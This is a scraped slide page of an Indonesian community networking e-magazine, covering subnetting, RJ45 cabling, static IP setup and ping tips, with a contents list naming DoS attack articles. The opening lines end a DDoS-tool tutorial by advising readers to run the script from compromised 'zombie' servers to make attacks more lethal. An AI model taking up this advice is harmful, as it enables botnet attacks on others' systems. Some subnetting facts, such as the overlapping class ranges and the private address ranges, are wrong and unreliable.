nb > bagusnya bandwith kaka dewo, biar nggak jadi senjata makan tuan,, dan untuk
penggunaan yang lebih memuaskan a.k.a mematikan, mending ne script di taruh di zombie-
zombienya agan, trus di execute, apalagi kalo punya zombie di server-server negara besar
yang mempunyai speed inet dewo, makin ampuh deh,,,,,,
nah sekian tutorial Bifi, Salam Backtrackers
Gretz To > All Codernate | ZIT Crew
referensi :
http://www.google.com
http://www.securitytube.net
./regards
Bifi
67e-ZIT #Vol 2 - Networking
ZIT Product & Info
Codernate Linux 1.4 (Dodorobe) Released!!!
Versi : Codernate Linux 1.4 Dodorobe
Tanggal Rilis : 13 Januari 2014
Pengguna : Beginers s/d Expert
Ukuran : 2.14 GB
Codernate Linux merupakan Sistem Operasi Berbasis Open Source (Linux) yang merupakan
Turunan dari Ubuntu 10.04 yang di kembangkan oleh Komunitas Zona IT Ternate.
Codernate Linux sendiri di modifikasi khusus untuk penetrasi jaringan, dan kurang lebih
terdapat sekitar 150 tool penetrasi yang filenya terdapat pada folder /pentest, dan langsung
bisa di eksekusi lewat menu Codernate.
68e-ZIT #Vol 2 - Networking
Dan setelah mengalami beberapa perbaikan pada bug dan tools, akhirnya Codernate Linux
1. 4 dengan Codename "Dodorobe" dengan bangga kami lepas ke publik. pada versi yang
kali ini masih sama seperti pada versi sebelumnya, yaitu masih tetap pada penetrasi
jaringan, hanya saja untuk yang versi ke 4 ini sudah ada sedikit penambahan beberapa tools
dll.
Bagi Teman-teman yang ingin langsung mencobanya bisa langsung download di link
berikut...
http://apps.e-zit.com/Codernate_Linux_1.4_dodorobe_v.iso << Dodorebe
untuk yang pengen coba versi sebelumnya [Codernate Cacarlak], bias juga di download di
link dibwah ini
http://apps.e-zit.com/Codernate_Linux_1.3_cacarlak_v.iso << Cacarlak
./regards
e-ZIT
69e-ZIT #Vol 2 - Networking
Credits
Cara Kirim Artikel Di e-ZIT edisi berikutnya
Isi materi artikel:
 Programing
 Networking
 Operating System
 Design & Art
 Hacking
Catatan: Artikel diharapkan sudah di post sebelumnya di www.forum.codernate.org, jika
materi hasil copas, harap di sertakan link referensinya, artikel yang masuk akan di seleksi
terlebih dahulu oleh redaksi e-ZIT.
Redaksi
Website : www.e-zit.com
Layouter : e-ZIT
Editor : e-ZIT
Cover : Bifi
Grets To : JMozac, Feenx_0, Mavis Vermilion, shockw4f3, Surtua, r8punkz3l, Bifi n All Staff
Zona IT Ternate
70e-ZIT #Vol 2 - Networking
Home Page

More Related Content

Similar to E zit #vol 2

Bab i dasar dasar jaringan
Bab i  dasar dasar jaringanBab i  dasar dasar jaringan
Bab i dasar dasar jaringanCandra Adi Putra
 
bahan ajar materi adminstrasi inftrastruktur jaringan kelas xii
bahan ajar materi adminstrasi inftrastruktur jaringan kelas xiibahan ajar materi adminstrasi inftrastruktur jaringan kelas xii
bahan ajar materi adminstrasi inftrastruktur jaringan kelas xiiSopyanLikabu
 
Bab 5 "Internet"
Bab 5 "Internet"Bab 5 "Internet"
Bab 5 "Internet"Dea20
 
Laporan 5 routing static mikrotic router
Laporan 5 routing static mikrotic routerLaporan 5 routing static mikrotic router
Laporan 5 routing static mikrotic routerWilly Winas
 
membangun gateway internet menggunakan router MIKROTIK
membangun gateway internet menggunakan router MIKROTIKmembangun gateway internet menggunakan router MIKROTIK
membangun gateway internet menggunakan router MIKROTIKintan hrn
 
kuliah Online Apti II Meringkas Modul
kuliah Online Apti II Meringkas Modulkuliah Online Apti II Meringkas Modul
kuliah Online Apti II Meringkas Moduldevyana73
 
Laporan 7 konfigurasi wireless lan
Laporan 7 konfigurasi wireless lanLaporan 7 konfigurasi wireless lan
Laporan 7 konfigurasi wireless lanWilly Winas
 
Ristianawati 2114 r0800 mikrotik
Ristianawati 2114 r0800 mikrotikRistianawati 2114 r0800 mikrotik
Ristianawati 2114 r0800 mikrotikRistianawati
 
Cara sharing internet pada windows 7
Cara sharing internet pada windows 7Cara sharing internet pada windows 7
Cara sharing internet pada windows 7irfan siregar
 
Ristianawati 2114 r0800 mikrotik
Ristianawati 2114 r0800 mikrotikRistianawati 2114 r0800 mikrotik
Ristianawati 2114 r0800 mikrotikRistianawati
 
MODUL MATA KULIAH PRODI ILMU KOMPUTER JARINGAN KOMPUTER
MODUL MATA KULIAH PRODI ILMU KOMPUTER JARINGAN KOMPUTERMODUL MATA KULIAH PRODI ILMU KOMPUTER JARINGAN KOMPUTER
MODUL MATA KULIAH PRODI ILMU KOMPUTER JARINGAN KOMPUTERkaruniaman
 
Laporan 4 pengenalan mikrotic router
Laporan 4 pengenalan mikrotic routerLaporan 4 pengenalan mikrotic router
Laporan 4 pengenalan mikrotic routerWilly Winas
 
adoc.pub_mtcna-mikrotik-certified-network-associate-trainin.pdf
adoc.pub_mtcna-mikrotik-certified-network-associate-trainin.pdfadoc.pub_mtcna-mikrotik-certified-network-associate-trainin.pdf
adoc.pub_mtcna-mikrotik-certified-network-associate-trainin.pdfAlmuminPajalele
 
Setting Dasar Mikrotik
Setting Dasar MikrotikSetting Dasar Mikrotik
Setting Dasar MikrotikTeukuMahawira
 
Tugas akhir silalahi afrina c
Tugas akhir silalahi afrina cTugas akhir silalahi afrina c
Tugas akhir silalahi afrina cAfrinaClarissa
 

Similar to E zit #vol 2 (20)

Zona IT E-Book Volume I
Zona IT E-Book Volume IZona IT E-Book Volume I
Zona IT E-Book Volume I
 
Bab 5
Bab 5Bab 5
Bab 5
 
Bab i dasar dasar jaringan
Bab i  dasar dasar jaringanBab i  dasar dasar jaringan
Bab i dasar dasar jaringan
 
bahan ajar materi adminstrasi inftrastruktur jaringan kelas xii
bahan ajar materi adminstrasi inftrastruktur jaringan kelas xiibahan ajar materi adminstrasi inftrastruktur jaringan kelas xii
bahan ajar materi adminstrasi inftrastruktur jaringan kelas xii
 
Bab 5 "Internet"
Bab 5 "Internet"Bab 5 "Internet"
Bab 5 "Internet"
 
Bab 5
Bab 5Bab 5
Bab 5
 
Laporan 5 routing static mikrotic router
Laporan 5 routing static mikrotic routerLaporan 5 routing static mikrotic router
Laporan 5 routing static mikrotic router
 
membangun gateway internet menggunakan router MIKROTIK
membangun gateway internet menggunakan router MIKROTIKmembangun gateway internet menggunakan router MIKROTIK
membangun gateway internet menggunakan router MIKROTIK
 
kuliah Online Apti II Meringkas Modul
kuliah Online Apti II Meringkas Modulkuliah Online Apti II Meringkas Modul
kuliah Online Apti II Meringkas Modul
 
Ip address
Ip addressIp address
Ip address
 
Laporan 7 konfigurasi wireless lan
Laporan 7 konfigurasi wireless lanLaporan 7 konfigurasi wireless lan
Laporan 7 konfigurasi wireless lan
 
Ristianawati 2114 r0800 mikrotik
Ristianawati 2114 r0800 mikrotikRistianawati 2114 r0800 mikrotik
Ristianawati 2114 r0800 mikrotik
 
Cara sharing internet pada windows 7
Cara sharing internet pada windows 7Cara sharing internet pada windows 7
Cara sharing internet pada windows 7
 
Mikrotik MTCNA
Mikrotik MTCNAMikrotik MTCNA
Mikrotik MTCNA
 
Ristianawati 2114 r0800 mikrotik
Ristianawati 2114 r0800 mikrotikRistianawati 2114 r0800 mikrotik
Ristianawati 2114 r0800 mikrotik
 
MODUL MATA KULIAH PRODI ILMU KOMPUTER JARINGAN KOMPUTER
MODUL MATA KULIAH PRODI ILMU KOMPUTER JARINGAN KOMPUTERMODUL MATA KULIAH PRODI ILMU KOMPUTER JARINGAN KOMPUTER
MODUL MATA KULIAH PRODI ILMU KOMPUTER JARINGAN KOMPUTER
 
Laporan 4 pengenalan mikrotic router
Laporan 4 pengenalan mikrotic routerLaporan 4 pengenalan mikrotic router
Laporan 4 pengenalan mikrotic router
 
adoc.pub_mtcna-mikrotik-certified-network-associate-trainin.pdf
adoc.pub_mtcna-mikrotik-certified-network-associate-trainin.pdfadoc.pub_mtcna-mikrotik-certified-network-associate-trainin.pdf
adoc.pub_mtcna-mikrotik-certified-network-associate-trainin.pdf
 
Setting Dasar Mikrotik
Setting Dasar MikrotikSetting Dasar Mikrotik
Setting Dasar Mikrotik
 
Tugas akhir silalahi afrina c
Tugas akhir silalahi afrina cTugas akhir silalahi afrina c
Tugas akhir silalahi afrina c
 

E zit #vol 2

  • 1. 1e-ZIT #Vol 2 - Networking
  • 2. 2e-ZIT #Vol 2 - Networking Introduce History ZONA IT TERNATE atau di singkat dengan ZIT, berdiri pada tanggal 18 Februari 2012 adalah suatu komunitas yang peduli akan perkembangan ilmu pengetahuan teknologi yang di buka secara umum baik untuk mahasiswa, pelajar maupun masyaratakat umum lainya, guna mengembangkan ilmu teknologi dan informasi dan sebagai media perkumpulan sesama pecinta IT. Visi “Menjadi komunitas yang komunikatif, informatif, kreatif, humanis dan berkualitas di tingkat Provinsi dan Nasional “ Misi  Menciptakan, menerapkan dan mengembangkan teknologi informasi yang berdaya guna dan berhasil guna bagi masyarakat.  Mendayakan tiap komponen yang ada untuk menguasai ilmu pengetahuan dan teknologi untuk memberikan yang terbaik bagi perkembangannya.  Mewujudkan sebuah wahana pengembangan ilmu pengetahuan dan teknologi diluar naungan kampus maupun sekolah  Menbentuk Keluarga Besar Pecinta IT Khususnya di Ternate dan Maluku Utara pada umumnya.  Menciptakan Komunitas yang memiliki jiwa kewirausahaan dan Berdaya saing Motto Learn, Explore, Action, Share
  • 3. 3e-ZIT #Vol 2 - Networking Kata Pengantar Puji syukur kami panjatkan ke hadirat Tuhan YME karena kasih setia dan pertolonganNya hingga kami dapat menyelesaikan buku ini walaupun agak lama jarak terbitnya dari e-ZIT Vol pertama. Di e-ZIT Vol 2 ini kami membahas mengenai Networking dan apa saja yang terkait di dalamnya, mulai dari langkah-langkah awal untuk menjadi seorang networker, basic networking dan beberapa tips n tricks yang juga masih di seputar dunia netrworking. Semoga di e-ZIT Vol 2 ini dapat membantu, dan menambah pengetahuan teman-teman mengenai dunia Netwroking. Dan kami mohon maaf apabila terdapat banyak kekurangan di e-ZIT vol 2 ini. Semua yang tercantum di dalam e-ZIT ini adalah hasil experiment, searching di internet dan Thread di forum codernate. Akhir kata, kami sampaikan terimakasih kepada semua pihak yang telah berperan dalam penyusunan e-ZIT ini dari awal sampai akhir. Selamat membaca… Salam Team Readksi & All Staff Zona IT Ternate
  • 4. 4e-ZIT #Vol 2 - Networking Index  Apa Tujuanmu Menjadi Seorang Networker/SysAdmin ? Apa Yang Harus Saya Pelajari ? #5  Cara Cepat Mengitung IP Address & Subnetting #7  Cara Konfigurasi RJ45 [Pengkabelan] #12  Setting IP Static di Backtrack/Ubuntu #17  Beragam Tips Perintah Ping #20  Mikrotik > Memberi Nama, Merubah Nama Interface, Setting IP Address dan NAT #22  Mikrotik > Management Bandwith Berdasarkan Extensi #24  Mikrotik > Cara Sederhana Membuat Hotspot #32  Mikrotik > Pisah Download, Browse & Game di 1 Line #33  Mikrotik > Leases Static DHCP #36  Network Scanning With NMAP #37  Security > Setting Mac Filtering Pada AP TP-LINK TL-WA610G #40  Security > Mencegah Serangan Ping Flooding Dengan Iptables #46  Security > Mencegah Serangan ARP, DNS/DHCP Spoofing & SSLstrip #48  Security > Apa Itu Honeypot ? #50  Network Attack > DoS Attack With Metasploit #57  Network Attack > POC Samsung Smart TV Denial of Service (DoS) Attack #62  Network Attack > How To Use Xerxes DDoS Tools #65  ZIT Product & Info #67 - Codernate Linux 1.4 (Dodorobe) Released!!!  Credits #69 - Cara Kirim Artikel Di e-ZIT edisi berikutnya - Redaksi - Grets  Home Page #70
  • 5. 5e-ZIT #Vol 2 - Networking Apa Tujuanmu Menjadi Seorang Networker/SysAdmin ? Apa Yang Harus Saya Pelajari ? Yups, akhirnya setelah 2 bulan vacum, ketemu lagi deh sama e-ZIT Vol 2, hehehe Nah, karena di Vol 2 temanya mengenai Networking, kali ini e-ZIT mau berbagi sedikit tips seputar Kaka-kaka yang pengen menggeluti dunia Networking,, iya Networking, iya bener, #halah okeh lanjut.. Bagi kaka-kaka yang bercita-cita menjadi seorang SysAdmin a.k.a Networker atau pengen mengenal lebih dalam, lebih dekat, lebih, jauh dan lebih-lebih lainnya mengenai dunia Networking, pasti akan berpikir, kira-kira Saya harus mulai dari mana dulu yah ? atau mungkin bertanya-tanya, apa yang harus Saya pelajari duluan yah? Dan masih banyak pertanyaan-pertanyaan lainnya.. Nah disini e-ZIT mau bagi sedikit tips neh, yang telah e-ZIT rangkum dari hasil wawancara dengan teman-teman ZIT, googling dan maen-maen di forum tetangga,,, hehehe Yups, tho the point saja,,, neh : 1. Basic IP dan Subnetting Mungkin kalau bisa dibilang yang sangat penting dari semua-nya adalah IP dan subnetting. Hal ini akan sangat terasa apabila Anda bekerja di ISP. Anda akan mempelajari cara efisiensi IP,apa itu gateway? Bagaimana mengatur IP yang baik, dll 2. Basic Hardware Networking Kenapa mesti dipelajari?? Karena dari sinilah inti perjalanan packet yang akan dikirim dari komputer kita ke Server. Apa itu Switch, Hub, Wireless. Taukah Anda bahwa switch lebih aman daripada WIFI?? Kapan saya menggunakan switch atau Wifi. Semua harus diperhitungkan dengan baik. Darimana kita belajar? Banyak buku yang mempelajari hal tersebut 3. Technology Switching dan Routing Kalau Anda sudah melebihi 1 jaringan di kantor Anda harus bisa melakukan routing terhadap jaringan. Tau tidak bahwa internet bisa terhubung ke mana-mana karena routing ini. Untuk switching Anda perlu mempelajari Teknologi VLAN dll. 4. Linux Loh, loh, loh, linux lagi, linux lagi, kenapa mesti linux ? kenapa nggak windows saja ?
  • 6. 6e-ZIT #Vol 2 - Networking Hahaha, yah begitulah, disamping Linux lebih stabil untuk Networking, kebanyakan OS server-server yang di pakai sekarang yah Linux, karena Linux emang cocok untuk Networking, lebih aman dari windows juga dan masih banyak manfaat dan kelebihan Linux untuk keperluan lainnya, bisa di bilang anak Networking, seorang SysAdmin atau Networker itu harus familiar sama OS yang satu ini… 5. Technology Server Kalau yang satu ini Anda akan banyak berhubungan dengan Server LDAP, DHCP, DNS, Dll. Intinya adalah memberikan service yang dibutuhkan untuk client. Untuk mencari informasi silahkan minta bantuan Google. Ketikkan service server yang ingin dipelajari 6. Security Nah setelah terbentuk server dan infrastruktur yang baik barulah Anda memperhatikan Security mulai dari Server, Router, sampai Anda membuat IDS untuk mendeteksi serangan 7. Monitoring Monitoring ini mencangkup semua hal baik dari infrastruktur maupun dari sisi Server. Semakin baik monitoring maka Anda akan mudah.. 8. Backup Hal ini sering dilupakan oleh para Network Administrator. Lakukan Backup Deferensial maupun Full untuk mengantisipasi Crash. Banyak teknologi yang dilakukan. Kalau saya lebih sering menggunakan RAID untuk Backup Harddisk dan Rsync untuk FIle Darimana Kaka bisa mempelajari hal-hal tersebut: 1. Dari Google yang pasti nya 2. Buku atau Ebook 3. Tutorial 4. Forum 5. Pengalaman dan TroubleShooting terhadap suatu masalah Yarp, mungkin itu saja sedikit tips yang bias e-ZIT berikan di kesempatan kali ini, apabila teman-teman punya saran yang lainnya jangan lupa di share juga yah ./regards e-ZIT
  • 7. 7e-ZIT #Vol 2 - Networking Cara Cepat Mengitung IP Address & Subnetting IP Address merupakan alat yang digunakan agar paket data dapat mencapai tujuan. Di dalam Jaringan, pengiriman suatu paket data membutuhkan alamat sebagai identitas suatu Data akan dikirimkan (Destination Address) dan berasal (Source Address). Agar unik setiap computer yang terkoneksi ke Internet diberi alamat yang berbeda. Alamat ini supaya seragam seluruh dunia maka pemberian alamat IP address diseluruh dunia diberikan oleh badan internasional Internet Assigned Number Authority (IANA), dimana IANA hanya memberikan IP address Network ID nya saja sedangkan host ID diatur oleh pemilik IP address tersebut. Contoh IP address untuk cisco.com adalah 202.93.35.9 untuk http://www.ilkom.unsri.ac.id dengan IP nya 202.39.35.9 http://www.freeimagehosting.net/nptte Ip address dibagi menjadi 2 bagian yaitu Network ID dan Host ID, Network ID yang akan menentukan alamat dalam jaringan (network address), sedangkan Host ID menentukan alamat dari peralatan jaringan yang sifatnya unik untuk membedakan antara satu mesin dengan mesin lainnya. Ibaratkan Network ID Nomor jalan dan alamat jalan sedangkan Host ID adalah nomor rumahnya. IP address dibagi menjadi kelas yaitu ; 1. Kelas A ( 1-126) 2. Kelas B ( 128 – 192) 3. Kelas C ( 192 – 223) 4. Kelas D (224 – 239) 5. Kelas E (240 – 255) IP Address Private & Public Jumlah IP Address sangat terbatas, apalagi jika harus memberikan alamat semua host di Jaringan Local Area Network (LAN). Sehingga perlu dilakukan efisiensi dalam penggunaan IP Address. Konsep subnetting IP Address merupakan teknik yang umum digunakan di Jaringan Internet untuk efisiensi alokasi IP Address dalam sebuah jaringan. Selain Konsep Subnetting, cara lain adalah dengan mengalokasikan beberapa IP Address khusus yang digunakan untuk lingkungan LAN dikenal dengan IP Private. Sedangkan IP Address yang dapat dikenal di Internet dikenal dengan IP Public. IP Private antara lain adalah : ß Class A: 10.0.0.0/8 ß Class B: 172.16.0.0/16 s/d 172.31.0.0/15 ß Class C: 192.168.0.0/24 s/d 192.168.255.0/24
  • 8. 8e-ZIT #Vol 2 - Networking Penghitungan Subnetting Pada hakekatnya semua pertanyaan tentang subnetting akan berkisar di empat masalah: Jumlah Subnet, Jumlah Host per Subnet, Blok Subnet, dan Alamat Host- Broadcast. Penulisan IP address umumnya adalah dengan 192.168.1.2. Namun adakalanya ditulis dengan 192.168.1.2/24, apa ini artinya? Artinya bahwa IP address 192.168.1.2 dengan subnet mask 255.255.255.0. Lho kok bisa seperti itu? Ya, /24 diambil dari penghitungan bahwa 24 bit subnet mask diselubung dengan binari 1. Atau dengan kata lain, subnet masknya adalah: 11111111.11111111.11111111.00000000 (255.255.255.0). Konsep ini yang disebut dengan CIDR (Classless Inter-Domain Routing) yang diperkenalkan pertama kali tahun 1992 oleh IEFT. http://www.freeimagehosting.net/tovgc SUBNETTING PADA IP ADDRESS CLASS C Ok, sekarang mari langsung latihan saja. Subnetting seperti apa yang terjadi dengan sebuah NETWORK ADDRESS 192.168.1.0/26 ? Analisa: 192.168.1.0 berarti kelas C dengan Subnet Mask /26 berarti 11111111.11111111.11111111.11000000 (255.255.255.192). Penghitungan: Seperti sudah saya sebutkan sebelumnya semua pertanyaan tentang subnetting akan berpusat di 4 hal, jumlah subnet, jumlah host per subnet, blok subnet, alamat host dan broadcast yang valid. Jadi kita selesaikan dengan urutan seperti itu: 1. Jumlah Subnet = 2x, dimana x adalah banyaknya binari 1 pada oktet terakhir subnet mask (2 oktet terakhir untuk kelas B, dan 3 oktet terakhir untuk kelas A). Jadi Jumlah Subnet adalah 22 = 4 subnet 2. Jumlah Host per Subnet = 2y - 2, dimana y adalah adalah kebalikan dari x yaitu banyaknya binari 0 pada oktet terakhir subnet. Jadi jumlah host per subnet adalah 26 - 2 = 62 host 3. Blok Subnet = 256 - 192 (nilai oktet terakhir subnet mask) = 64. Subnet berikutnya adalah 64 + 64 = 128, dan 128+64=192. Jadi subnet lengkapnya adalah 0, 64, 128, 192. 4. Bagaimana dengan alamat host dan broadcast yang valid? Kita langsung buat tabelnya. Sebagai catatan, host pertama adalah 1 angka setelah subnet, dan broadcast adalah 1 angka sebelum subnet berikutnya. http://www.freeimagehosting.net/jgix4
  • 9. 9e-ZIT #Vol 2 - Networking SUBNETTING PADA IP ADDRESS CLASS B Berikutnya kita akan mencoba melakukan subnetting untuk IP address class B. Pertama, subnet mask yang bisa digunakan untuk subnetting class B adalah seperti dibawah. Sengaja saya pisahkan jadi dua, blok sebelah kiri dan kanan karena masing-masing berbeda teknik terutama untuk oktet yang “dimainkan” berdasarkan blok subnetnya. CIDR /17 sampai /24 caranya sama persis dengan subnetting Class C, hanya blok subnetnya kita masukkan langsung ke oktet ketiga, bukan seperti Class C yang “dimainkan” di oktet keempat. Sedangkan CIDR /25 sampai /30 (kelipatan) blok subnet kita “mainkan” di oktet keempat, tapi setelah selesai oktet ketiga berjalan maju (coeunter) dari 0, 1, 2, 3, dst. http://www.freeimagehosting.net/wyove Ok, kita coba dua soal untuk kedua teknik subnetting untuk Class B. Kita mulai dari yang menggunakan subnetmask dengan CIDR /17 sampai /24. Contoh network address 172.16.0.0/18. Analisa: 172.16.0.0 berarti kelas B, dengan Subnet Mask /18 berarti 11111111.11111111.11000000.00000000 (255.255.192.0). Penghitungan: 1. Jumlah Subnet = 2x, dimana x adalah banyaknya binari 1 pada 2 oktet terakhir. Jadi Jumlah Subnet adalah 22 = 4 subnet 2. Jumlah Host per Subnet = 2y - 2, dimana y adalah adalah kebalikan dari x yaitu banyaknya binari 0 pada 2 oktet terakhir. Jadi jumlah host per subnet adalah 214 - 2 = 16.382 host 3. Blok Subnet = 256 - 192 = 64. Subnet berikutnya adalah 64 + 64 = 128, dan 128+64=192. Jadi subnet lengkapnya adalah 0, 64, 128, 192. 4. Alamat host dan broadcast yang valid? http://www.freeimagehosting.net/t12dy Berikutnya kita coba satu lagi untuk Class B khususnya untuk yang menggunakan subnetmask CIDR /25 sampai /30. Contoh network address 172.16.0.0/25. Analisa: 172.16.0.0 berarti kelas B, dengan Subnet Mask /25 berarti 11111111.11111111.11111111.10000000 (255.255.255.128). Penghitungan: 1. Jumlah Subnet = 29 = 512 subnet 2. Jumlah Host per Subnet = 27 - 2 = 126 host 3. Blok Subnet = 256 - 128 = 128. Jadi lengkapnya adalah (0, 128) 4. Alamat host dan broadcast yang valid? http://www.freeimagehosting.net/sa19j
  • 10. 10e-ZIT #Vol 2 - Networking SUBNETTING PADA IP ADDRESS CLASS A Kalau sudah mantab dan paham, kita lanjut ke Class A. Konsepnya semua sama saja. Perbedaannya adalah di OKTET mana kita mainkan blok subnet. Kalau Class C di oktet ke 4 (terakhir), kelas B di Oktet 3 dan 4 (2 oktet terakhir), kalau Class A di oktet 2, 3 dan 4 (3 oktet terakhir). Kemudian subnet mask yang bisa digunakan untuk subnetting class A adalah semua subnet mask dari CIDR /8 sampai /30. Kita coba latihan untuk network address 10.0.0.0/16. Analisa: 10.0.0.0 berarti kelas A, dengan Subnet Mask /16 berarti 11111111.11111111.00000000.00000000 (255.255.0.0). Penghitungan: 1. Jumlah Subnet = 28 = 256 subnet 2. Jumlah Host per Subnet = 216 - 2 = 65534 host 3. Blok Subnet = 256 - 255 = 1. Jadi subnet lengkapnya: 0,1,2,3,4, etc. 4. Alamat host dan broadcast yang valid? http://www.freeimagehosting.net/c6pj3 Catatan: Semua penghitungan subnet diatas berasumsikan bahwa IP Subnet-Zeroes (dan IP Subnet-Ones) dihitung secara default. Buku versi terbaru Todd Lamle dan juga CCNA setelah 2005 sudah mengakomodasi masalah IP Subnet-Zeroes (dan IP Subnet-Ones) ini. CCNA pre- 2005 tidak memasukkannya secara default (meskipun di kenyataan kita bisa mengaktifkannya dengan command ip subnet-zeroes), sehingga mungkin dalam beberapa buku tentang CCNA serta soal-soal test CNAP, anda masih menemukan rumus penghitungan Jumlah Subnet = 2x – 2 Tujuan Subnetting: ß Menghemat penggunaan IP Public. ß Mengurangi tingkat kongesti (kemacetan) komunikasi data didalam Jaringan. ß Mengatasi perbedaan hardware dan media fisik yang digunakan dalam suatu network. ß Memecah Broadcast Domain. Proses subnetting adalah “memindahkan” atau menggeser garis pemisah antara bagian network dan bagian host darisuatu IP Address.
  • 11. 11e-ZIT #Vol 2 - Networking Beberapa bit dari bagian host-ID dialokasikan menjadi bit tambahan pada bagian network- ID. Network Address pada satu Jaringan Tunggal dipecah menjadi beberapa subnetwork. Proses Subnetting dapat membuat sejumlah network tambahan dengan mengurangi jumlah maksimum host yang ada dalam tiap network tersebut..... Semoga bermanfaat ya..... :) ket : tabel subnetting >> http://4.bp.blogspot.com/_rQYEfq496fE/TM...ting_c.png special thank : http://bakirmuhammad2711.blogspot.com/ ./regards shockw4v3
  • 12. 12e-ZIT #Vol 2 - Networking Cara Konfigurasi RJ45 [Pengkabelan] Assalamuallaikum wr...wb Hallo sahabatku. Ini mungkin artikel pertama saya di forum.codernate.org. basic sih, tapi apa salahnya di share… wkwkwk Nah kali ini saya akan share tentang cara konfigurasi kabel RJ 45. Sedikit cerita tentang pengalaman saya, ceritanya waktu itu lagi dapat tugas kampus. Tugasnya tentang cara membuat dan mengenali kabel RJ45 tersebut, dan saya yang notabenenya masih newbie didunia IT, masih kebingungan membedakan susunan alias cara konfigurasi kabel tersebut.. OK ini OOT.. Sedikit penjelasan, Berdasarkan media transmisi, dalam jaringan terbagi menjadi 2, yaitu: Jaringan berkabel ( wired Network ) Jaringan Nirkabel ( wirelles Network ) Dan menurut pengalaman dan yang saya tau, dalam media transmisi jaringan dalam hal ini pada kabelnya, ada terdapat 3 buah kabel sebgai medianya, yaitu: 1. Fiber optik ( FO ) 2. Coaxial 3. RJ45 Tentunya para sahabat” yang sudah berkecimpung di dunia IT sudah pada paham kan tentang Transmisi yang saya sisipkan di atas dan pengertianya serta perkembangannya,,, Ok langsung saja kita kembali ke topik permasalahan yaitu dimana kita akan membahas tentang RJ 45. Yang saya mau bahas kali ini mengenai kabel RJ 45 sedikit gambaran tentang pemahaman kabel RJ 45 tersebut yaitu memiliki 8 pin dan ke delapan pin tersebut sudah mempunyai tugas tersendiri yang di rinci atau di bagi 2 yaitu empat nya untuk data dan empatnya lagi untuk daya, antara lain yaitu : 1236 > Untuk Data 4578 > Untuk Daya
  • 13. 13e-ZIT #Vol 2 - Networking Nah masih bingung ya,,ok langsung saja pada poin di bawah ini...!!! #Stright Susunan Stright Titik A Titik B Putih orange > Putih orange Orange > Orange Putih hijau > Putih hijau Biru > Biru Putih biru > Putih biru Hijau > Hijau Putih coklat > Putih coklat Coklat > Coklat Nah seperti yang teman-teman lihat pada gambar di atas, susunan kabel pada pin yang tertancap di konektor sudah sesuai dengan warna-warna yang telah ditetapkan tadi. Nah tipe diatas ialah tipe straight, dimana susunan warna kabel pada titik A dan titik B tetap sama posisi dan letaknya. hehehhee masih bingung ya...!!!
  • 14. 14e-ZIT #Vol 2 - Networking Ok saya akan contohkan seperti gambar berikut ini Semoga pada tahap ini sobat sudah mulai paham…
  • 15. 15e-ZIT #Vol 2 - Networking #Cross Susunan Cross Titik A Titik B Putih orange > Putih Hijau Orange > Hijau Putih hijau > Putih Orange Biru > Biru Putih biru > Putih biru Hijau > Orange Putih coklat > Putih coklat Coklat > Coklat Nah ini nih yang mereka sebut susunan cross, dimana susunan warna kabel pada Titik A dan Titik B sudah berbeda satu sama lain, dan bagian yang diwarnai itu [Titik B] adalah pada ujung kabel yang satunya, jika pada stright, susunan warna kedua kabel sama posisinya, nah pada cross ujung yang satunya seperti stright sedangkan yang satunya lagi susunannya seperti keterangan diatas.. kira-kira begitu cara konfigurasi susunan kabel RJ45 yang saya ketahui.
  • 16. 16e-ZIT #Vol 2 - Networking Sekian. mungkin itu saja sedikit pengalaman saya tentang konfigurasi RJ45. Maaf jika masih terdapat banyak kekurangan atau kesalahan pada artikel saya… Wasallam. Thank’s buat yang sudah baca atau ikut petunjuk saya,,,!!! ./Regards Surtua
  • 17. 17e-ZIT #Vol 2 - Networking Setting IP Static di Backtrack/Ubuntu Salam Backtrackers Bifi Ada Lagi, kali ini ane mw share cara setting ip static di backtrack/ubuntu.. letz rock Cara Pertama Open Terminal Lalu Ketik comand ini Code: nano /etc/network/interfaces Nah setelah nano editor terbuka maka akan muncul kayak gini Code: auto lo iface lo inet loopback ------------------------------------- auto eth0 iface eth0 inet dhcp address network < edit di bagian ini broadcast netmask gateway ------------------------------------- auto ath0 iface ath0 inet dhcp auto wlan0 iface wlan0 inet dhcp disitu ada beberapa interfaces seperti eth1,eth2,eth0 dll lalu cari interface eth0 kemudian ganti iface eth0 inet dhcp menjadi static masukan address, network, broadcast, netmask n gateway contoh aja Code: auto eth0 iface eth0 inet static address 10.20.30.2 network 10.20.30.0 broadcast 10.20.30.7 netmask 255.255.255.248 gateway 10.20.30.2
  • 18. 18e-ZIT #Vol 2 - Networking setelah itu di ctrl+x untuk save.. Jangan lupa setting dnsnya di sini Code: nano /etc/resolv.conf ntar di nano editornya ketik saja dns kali ini ane make mbah gugel kayak gini Code: nameserver 8.8.8.8 nameserver 8.8.4.4
  • 19. 19e-ZIT #Vol 2 - Networking Cara Kedua Masih Di Terminal ketik comand berikut secara bertahap Code: root@bt~# ifconfig eth0 10.20.30.2/24 root@bt~# route add default gw 10.20.30.2 root@bt~# echo nameserver 8.8.8.8 > /etc/resolv.conf Lalu restart interfacenya Code: /etc/init.d/networking restart nah kalo udah di restart networknya ketik ifconfig untuk mngecek apakah ipnya berubah seperti yang di setting tadi ataw tidak... Kalo Belum berubah, silahkan di ulangi langkah di atas.... nb : ketik saja comand berikut Code: update-rc.d networking defaults agar settingannya dapat terload ketika terestart... setelah itu restart backtrack anda.. untuk lebih detail tentang apa itu address, network, broadcast, netmask n gateway, silahkan tnya di gugel.... YUps, sekian tutor saya menganai setting ip static di backtrack/ubuntu... next time ane share lagi tentang cara buat DNS Server... Referensi > http://www.google.com ./regards Bifi
  • 20. 20e-ZIT #Vol 2 - Networking Beragam Tips Perintah Ping Baris perintah ini sangat penting untuk kita gunakan. Apalagi jika menyangkut dengan komunikasi antar jaringan,, ya inilah baris perintah ping. “Ping merupakan salah satu program yang digunakan untuk mengecek komunikasi antar komputer dalam sebuah jaringan melalui protocol TCP/IP”. ping akan mengirimkan internet control message protocol (ICMP) Echo Request messages pada IP address komputer yang di tuju dan meminta respon dari komputer tersebut. Jika komputer target memberikan respon, komputer tersebut memberikan informasi seperti contoh hasil ping report dibawah ini : Beragam Tips Perintah Ping : 1. Menambah/mengurangi interval waktu antara paket. Secara default, ping menunggu 1 detik sebelum mengirim paket berikutnya. denagan opsi -i, anda dapat menambah atau mengurangi interval tersebut contoh : tungu 5 detik sebelum mengirim paket berikutnya dan tunggu 0,1 detik sebelum mengirim paket berikutnya. Code: #ping -i 5 192.168.0.28 #ping -i 0.1 192.168.0.28 2. Periksa antarmuka jaringan lokal : Up dan Running. Sebelum memesiksa apakah mesin peer 